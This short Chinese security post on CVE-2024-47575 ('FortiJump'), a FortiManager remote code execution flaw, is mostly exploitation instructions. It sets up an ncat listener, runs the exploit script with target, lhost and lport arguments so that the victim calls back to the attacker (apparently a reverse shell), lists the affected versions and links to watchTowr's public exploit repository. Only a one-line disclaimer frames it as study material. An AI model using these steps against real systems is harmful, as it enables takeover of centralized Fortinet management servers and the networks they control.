CVE-2024-47575 Fortinet FortiManager RCE exp(FortiJump)

云梦DC 云梦安全 2024-11-22 01:11

漏洞利用方法

首先，建立您的 ncat 会话：

nc -lvvnp 80

然后，执行我们的检测工件生成器：

python3 CVE-2024-47575.py--target192.168.1.110--lhost192.168.1.53--lport80--action exploit

要单独检查漏洞，请使用以下选项：

python3 CVE-2024-47575.py--target192.168.1.110--action check

受影响的版本

FortiManager 7.6.0 FortiManager 7.4.0 through 7.4.4 FortiManager 7.2.0 through 7.2.7 FortiManager 7.0.0 through 7.0.12 FortiManager 6.4.0 through 6.4.14 FortiManager 6.2.0 through 6.2.12 FortiManager Cloud 7.4.1 through 7.4.4 FortiManager Cloud 7.2.1 through 7.2.7 FortiManager Cloud 7.0.1 through 7.0.12 FortiManager Cloud 6.4

漏洞作者

该漏洞由watchTowr (@watchtowrcyber)的Sina Kheirkhah (@SinSinology)编写

项目地址

GitHub：

https://github.com/watchtowrlabs/Fortijump-Exploit-CVE-2024-47575

注：仅供在测试环境中学习使用，本文仅供参考交流